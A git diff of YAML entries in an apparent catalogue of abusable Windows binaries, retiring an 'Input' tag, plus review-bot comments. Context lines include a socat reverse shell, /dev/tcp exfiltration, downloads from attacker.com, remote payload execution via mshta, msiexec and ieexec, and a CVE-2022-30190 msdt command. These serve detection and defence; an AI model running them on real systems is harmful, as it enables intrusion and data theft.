diff --git a/yml/OSBinaries/Addinutil.yml b/yml/OSBinaries/Addinutil.yml index 7f18846..7ff3145 100644 --- a/yml/OSBinaries/Addinutil.yml +++ b/yml/OSBinaries/Addinutil.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: .NetObjets - - Input: Fixed Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index 2c1c1ed..1239772 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 7 or older Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 99c1efb..d8f5064 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 87d2963..ec33fe0 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" Description: Executes a reverseshell Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' Description: Exfiltrate data Usecase: Performs execution of specified file, can be used as a defensive evasion. 
@@ -33,7 +31,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format - Command: bash.exe -c calc.exe Description: Executes calc.exe from bash.exe Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. @@ -43,7 +40,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index 1698354..34b5c3f 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows Server 2022 Tags: - Execute: DLL - - Input: Custom Format - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 Description: Downloads text formatted files Usecase: Download scripts, webshells etc. diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 3a91d24..bccde85 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF - - Input: Custom Format - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: INF - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe 
diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index c0b4972..3dca837 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: "conhost.exe --headless calc.exe" Description: Execute calc.exe with conhost.exe as parent process Usecase: Specify --headless parameter to hide child process window (if applicable) @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: c:\windows\system32\conhost.exe Detection: diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index a9b8c99..a486458 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: control.exe c:\windows\tasks\evil.cpl Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function) Usecase: Use to execute code and bypass application whitelisting @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 3f9d352..129672d 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe diff --git a/yml/OSBinaries/CustomShellHost.yml b/yml/OSBinaries/CustomShellHost.yml index 16dd0b0..7390b35 100644 
--- a/yml/OSBinaries/CustomShellHost.yml +++ b/yml/OSBinaries/CustomShellHost.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\CustomShellHost.exe Detection: diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index c52a3a6..ab8ca26 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: ClickOnce - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index a3ddba2..c54501f 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows server Tags: - Execute: CMD - - Input: Custom Format - Command: diskshadow> exec calc.exe Description: Execute commands using diskshadow.exe to spawn child process Usecase: Use diskshadow to bypass defensive counter measures @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows server Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index f4db3af..613ce76 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index e3328c1..378d7c2 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml 
@@ -46,7 +46,6 @@ Commands: Privileges: Admin MitreID: T1003.003 OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server - Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index f488534..1c0e2ff 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: explorer.exe C:\Windows\System32\notepad.exe Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index 076343a..c75e30a 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index 8b77196..a236872 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml 
@@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe diff --git a/yml/OSBinaries/Fsutil.yml b/yml/OSBinaries/Fsutil.yml index 5714d37..e4b38ed 100644 --- a/yml/OSBinaries/Fsutil.yml +++ b/yml/OSBinaries/Fsutil.yml @@ -27,7 +27,6 @@ Commands: OperatingSystem: Windows 11 Tags: - Execute: EXE - - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\fsutil.exe - Path: C:\Windows\SysWOW64\fsutil.exe diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 21ea0a6..6b4828b 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Custom Format - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" Description: Download Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 0a5b355..3ac6adc 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml 
@@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Fixed Format - Command: Gpscript /startup Description: Executes startup scripts configured in Group Policy Usecase: Add local group policy logon script to execute file and hide from defensive counter measures @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index bc55c98..e861cd2 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -20,7 +20,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: HH.exe http://some.url/payload.chm Description: Executes a remote payload.chm file which can contain commands. Usecase: Execute commands with HH.exe @@ -32,7 +31,6 @@ Commands: - Execute: CMD - Execute: CHM - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\hh.exe - Path: C:\Windows\SysWOW64\hh.exe diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index ae5dd4a..80c6cc5 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF - - Input: Fixed Format Full_Path: - Path: c:\windows\system32\ie4uinit.exe - Path: c:\windows\sysWOW64\ie4uinit.exe diff --git a/yml/OSBinaries/Iediagcmd.yml b/yml/OSBinaries/Iediagcmd.yml index 9d5ddcc..056e30e 100644 --- a/yml/OSBinaries/Iediagcmd.yml +++ b/yml/OSBinaries/Iediagcmd.yml 
@@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11 Tags: - Execute: EXE - - Input: Fixed Format Full_Path: - Path: C:\Program Files\Internet Explorer\iediagcmd.exe Detection: diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index 43ba954..3b659dd 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: Remote - Execute: .NetEXE - - Input: Custom Format - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location @@ -25,7 +24,6 @@ Commands: Tags: - Execute: Remote - Execute: .NetEXE - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index 9d8c607..d0f129a 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index a5868ca..8a07010 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: .NetDLL - Execute: .NetEXE - - Input: Custom Format - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting 
@@ -25,7 +24,6 @@ Commands: Tags: - Execute: .NetDLL - Execute: .NetEXE - - Input: Custom Format - Command: InstallUtil.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index f89afc0..33e2aa7 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Usecase: Inject dll file into running process @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index a711f8e..5d76aca 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: VB.Net - Execute: Csharp - - Input: Custom Format - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -25,7 +24,6 @@ Commands: Tags: - Execute: VB.Net - Execute: Csharp - - Input: Custom Format - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code 
@@ -36,7 +34,6 @@ Commands: Tags: - Execute: VB.Net - Execute: Csharp - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 0eb4ee9..7cbe41a 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: mmc.exe gpedit.msc Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 80a2fa5..da29e92 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: Csharp - - Input: Custom Format - Command: msbuild.exe project.csproj Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: Csharp - - Input: Custom Format - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo Description: Executes generated Logger DLL file with TargetLogger export Usecase: Execute DLL @@ -33,7 +31,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: msbuild.exe project.proj Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Usecase: Execute project file that contains XslTransformation tag parameters 
@@ -43,7 +40,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH - - Input: Custom Format - Command: msbuild.exe @sample.rsp Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Usecase: Bypass command-line based detections @@ -53,7 +49,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index 54ba0b5..f8c829e 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\msconfig.exe Code_Sample: diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index 1b9649e..e681104 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -14,7 +14,6 @@ Commands: Tags: - Application: GUI - Execute: MSI - - Input: Custom Format - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting 
@@ -25,7 +24,6 @@ Commands: Tags: - Application: GUI - Execute: MSI - - Input: Custom Format - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe" Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Usecase: Execute code bypass Application allowlisting @@ -36,7 +34,6 @@ Commands: Tags: - Application: GUI - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe diff --git a/yml/OSBinaries/Msedge.yml b/yml/OSBinaries/Msedge.yml index 96d6f82..d0cc16d 100644 --- a/yml/OSBinaries/Msedge.yml +++ b/yml/OSBinaries/Msedge.yml @@ -27,7 +27,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index a3d4fde..355b547 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: WSH - Execute: Remote - - Input: Custom Format - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index f58f027..92390c1 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml 
@@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: MSI - - Input: Custom Format - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png Description: Installs the target remote & renamed .MSI file silently. Usecase: Execute custom made msi file with attack code from remote server @@ -24,7 +23,6 @@ Commands: Tags: - Execute: MSI - Execute: Remote - - Input: Custom Format - Command: msiexec /y "C:\folder\evil.dll" Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files @@ -35,7 +33,6 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Input: Custom Format - Command: msiexec /z "C:\folder\evil.dll" Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files @@ -46,7 +43,6 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Input: Custom Format - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server @@ -56,7 +52,6 @@ Commands: OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe
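Review bot: the Esentutl.yml hunk (`@@ -46,7 +46,6`) deletes a blank line between `OperatingSystem:` and `Full_Path:` rather than an `Input:` tag, which is what every other hunk in this patch removes. If the blank line is a whitespace cleanup it is unrelated to retiring the tag and belongs in its own commit; if the intent was to strip an `Input:` entry, there is none at that position in the visible context and the hunk should be dropped.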
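Review bot: every hunk removes an `- Input: Custom Format` or `- Input: Fixed Format` entry under `Tags:`, but nothing in the patch touches whatever defines the permitted tag set (a schema, a validator, the site templates that render tags), so anything that still enumerates `Input` as a tag category is left out of step with the data. Confirm the `Input` category is removed wherever it is declared in the same change, and check the YAML files not covered here (the excerpt ends at Msiexec.yml) for remaining `Input:` entries so the corpus does not end up half-migrated.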
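Review bot: the Addinutil.yml hunk leaves the context line `- Execute: .NetObjets` untouched; that spelling looks like a typo for `.NetObjects`. Since this patch is already normalising the `Tags:` blocks, it is worth checking the value against the project's tag vocabulary and correcting it in the same pass rather than leaving a one-off tag that nothing else will match.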